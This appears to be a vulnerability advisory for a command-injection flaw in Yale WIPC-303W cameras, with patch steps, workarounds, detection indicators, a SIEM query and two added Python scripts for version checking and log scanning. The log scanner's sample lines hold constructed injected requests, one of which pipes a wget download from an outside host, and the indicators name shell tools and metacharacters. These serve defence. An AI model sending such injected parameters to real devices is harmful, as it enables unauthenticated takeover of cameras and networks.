CVE-2020-23826

8.8 HIGH

📋 TL;DR

This vulnerability allows remote attackers to execute arbitrary commands on Yale WIPC-303W IP cameras through command injection in the HTTP API. Attackers can gain full control of affected devices without authentication. This affects Yale WIPC-303W cameras running firmware versions 2.21 through 2.31.

💻 Affected Systems

Products:
  • Yale WIPC-303W IP Camera
Versions: 2.21 through 2.31
Operating Systems: Embedded Linux
Default Config Vulnerable: ⚠️ Yes
Notes: May also affect related Yale camera models. Note potential duplicate with CVE-2020-10176.

⚠️ Risk & Real-World Impact

🔴 Worst Case

Complete device takeover allowing attackers to install persistent malware, pivot to internal networks, disable security features, or use cameras for botnet participation.

🟠 Likely Case

Unauthorized access to camera feeds, device configuration changes, credential theft, and potential lateral movement to other network devices.

🟢 If Mitigated

Limited impact if cameras are isolated on separate VLANs with strict network segmentation and access controls.

🌐 Internet-Facing: HIGH - Directly exposed cameras can be exploited by any internet-based attacker without authentication.
🏢 Internal Only: MEDIUM - Requires internal network access but exploitation is straightforward once network access is obtained.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: CONFIRMED
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploitation requires sending specially crafted HTTP requests to the camera's API endpoints. Public exploit code and technical details are available in the referenced reports.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Firmware version 2.32 or later

Vendor Advisory: https://www.yalehome.com/support/security-advisories

Restart Required: Yes

Instructions:

1. Download the latest firmware from the Yale support portal.
2. Access the camera web interface.
3. Navigate to System > Maintenance > Upgrade.
4. Upload the firmware file.
5. Wait for the automatic reboot.

🔧 Temporary Workarounds

Network Segmentation

Applies to: all

Isolate cameras on separate VLAN with strict firewall rules blocking all inbound traffic except from authorized management systems.

HTTP API Restriction

Applies to: all

Block access to camera HTTP API endpoints from untrusted networks using firewall rules or web application firewall.

🧯 If You Can't Patch

  • Disable remote access and ensure cameras are only accessible from internal management networks
  • Implement strict network monitoring for unusual HTTP requests to camera IP addresses

🔍 How to Verify

Check if Vulnerable:

Check firmware version via web interface at System > Information > Firmware Version. If version is between 2.21 and 2.31 inclusive, device is vulnerable.

Check Version:

curl -s http://[CAMERA_IP]/cgi-bin/version.cgi | grep Firmware

Verify Fix Applied:

Verify firmware version shows 2.32 or higher after update. Test HTTP API endpoints with known safe payloads to confirm command injection is no longer possible.
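The version check above is a manual step; the following script is an added example (not part of this advisory or any Yale tooling) that classifies the output of the curl command against the advisory's inclusive 2.21 to 2.31 range. It compares version components as integers rather than as strings, because a string comparison would place "2.3" between "2.21" and "2.31" and "2.4" above "2.32"; treating "2.3" as minor release 3 rather than 2.30 is an assumption about Yale's numbering, as is the "Firmware: X.Y" output format.

```python
import re
import sys

# Inclusive affected range and first fixed release, as stated in the advisory.
VULN_RANGE = ((2, 21), (2, 31))
FIXED_FROM = (2, 32)

# Accepts "Firmware: 2.25", "Firmware Version: v2.32", "Firmware=2.31.4" ...
# The exact output format of version.cgi is an assumption.
VERSION_RE = re.compile(r"Firmware(?: Version)?\s*[:=]?\s*v?(\d+(?:\.\d+)+)", re.I)


def parse_version(text):
    """Return the firmware version as a tuple of ints, or None if not found."""
    m = VERSION_RE.search(text)
    if not m:
        return None
    return tuple(int(part) for part in m.group(1).split("."))


def firmware_status(text):
    """Classify a version banner: vulnerable / fixed / outside-advisory-range / unknown."""
    version = parse_version(text)
    if version is None:
        return "unknown"
    key = version[:2]  # only major.minor is significant for the advisory range
    if VULN_RANGE[0] <= key <= VULN_RANGE[1]:
        return "vulnerable"
    if key >= FIXED_FROM:
        return "fixed"
    return "outside-advisory-range"


if __name__ == "__main__":
    # Usage: curl -s http://[CAMERA_IP]/cgi-bin/version.cgi | python3 check_version.py
    banner = sys.stdin.read()
    print(firmware_status(banner), parse_version(banner))
```

Pipe the curl output from the step above into the script; "outside-advisory-range" means the version parsed but is older than 2.21, which the advisory does not cover and should be checked separately.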

📡 Detection & Monitoring

Log Indicators:

  • Unusual HTTP POST requests to API endpoints
  • Commands like 'ping', 'wget', 'curl' in HTTP parameters
  • Multiple failed authentication attempts followed by successful API calls

Network Indicators:

  • HTTP requests containing shell metacharacters (;, |, &, $)
  • Outbound connections from cameras to unexpected external IPs
  • Unusual traffic patterns from camera to internal systems

SIEM Query:

source="camera_logs" AND (http_uri="/cgi-bin/*" AND http_method="POST") AND (http_query CONTAINS ";" OR http_query CONTAINS "|" OR http_query CONTAINS "&")
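The SIEM query above matches raw query strings, so it will fire on every ordinary "a=1&b=2" request and will miss a percent-encoded ";" (%3B). The following is an added example (not part of this advisory) that applies the same log and network indicators to access-log lines in common log format: it scopes to /cgi-bin/, percent-decodes each parameter before looking for the listed shell metacharacters, matches the listed command names as whole words, and splits on "&" only. The log lines are constructed, the /cgi-bin/example.cgi endpoint is a placeholder, and the addresses are documentation ranges.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed sample access-log lines (not real camera logs); the endpoint
# name example.cgi is a placeholder, not a known Yale API path.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /cgi-bin/version.cgi HTTP/1.1" 200 128
203.0.113.5 - - [01/Jan/2024:10:00:02 +0000] "POST /cgi-bin/example.cgi?name=cam1&mode=day HTTP/1.1" 200 64
203.0.113.5 - - [01/Jan/2024:10:00:03 +0000] "POST /cgi-bin/example.cgi?name=cam1%3Bping%20-c1%20203.0.113.99 HTTP/1.1" 200 64
203.0.113.5 - - [01/Jan/2024:10:00:04 +0000] "POST /cgi-bin/example.cgi?host=10.0.0.1%7Cwget%20http://203.0.113.99/x HTTP/1.1" 200 64
198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /cgi-bin/example.cgi?action=ping_test HTTP/1.1" 200 64
198.51.100.7 - - [01/Jan/2024:10:00:06 +0000] "GET /index.html HTTP/1.1" 200 2048
"""

# Common log format: client, identd, user, [timestamp], "METHOD target proto", status
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

SHELL_META = set(";|&$`")            # metacharacters listed in the advisory, plus backtick
SUSPECT_CMDS = ("ping", "wget", "curl")  # command names listed in the advisory


def decoded_params(query):
    """Percent-decode each name=value pair. Split on '&' only: older parse_qsl
    versions also split on ';', which would erase the very character we look for."""
    return [unquote_plus(pair) for pair in query.split("&") if pair]


def analyze_line(line):
    """Return a finding dict for a suspicious /cgi-bin/ request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None                      # not an access-log line we understand
    parts = urlsplit(m.group("target"))
    if not parts.path.startswith("/cgi-bin/"):
        return None                      # the indicator is scoped to the HTTP API
    params = decoded_params(parts.query)
    metas = sorted({ch for p in params for ch in p if ch in SHELL_META})
    # Whole-word match so "ping_test" or "pingcount" do not count as "ping".
    cmds = sorted({c for p in params for c in SUSPECT_CMDS
                   if re.search(r"\b%s\b" % c, p.lower())})
    if not metas and not cmds:
        return None
    return {"src": m.group("src"), "method": m.group("method"),
            "path": parts.path, "metachars": metas, "commands": cmds}


def scan_log(text):
    """Run analyze_line over every line and return the non-empty findings."""
    findings = []
    for line in text.splitlines():
        f = analyze_line(line)
        if f:
            findings.append(f)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f)
```

Only request lines are visible in an access log, so POST bodies are not covered here; a reverse proxy or WAF in front of the camera that logs bodies is the place to apply the same decoded-parameter check to them.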
